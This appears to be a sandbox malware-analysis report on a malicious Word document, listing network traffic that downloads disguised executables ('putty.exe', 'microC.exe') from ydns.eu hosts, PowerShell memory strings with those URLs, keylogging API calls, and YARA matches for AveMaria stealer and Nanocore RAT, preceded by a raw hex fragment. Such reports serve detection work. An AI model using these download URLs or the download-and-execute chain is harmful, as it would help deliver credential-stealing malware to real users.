00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: newhosteeeee.ydns.eu
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/p
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putt
        Source: powershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exePE
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://ja.com/
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://java.co
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmpString found in binary or memory: http://newhosteeeee.ydns.eu
        Source: powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: http://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: putty.exe, 0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp, putty.exe, 0000000B.00000002.2117025453.0000000000102000.00000020.00020000.sdmpString found in binary or memory: https://antizapret.prostovpn.org/domains-export.txt.GDPI
        Source: putty.exe, images.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Installs a global keyboard hookShow sources
        Source: C:\ProgramData\images.exeWindows user hook set: 0 keyboard low level C:\ProgramData\images.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

        E-Banking Fraud:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
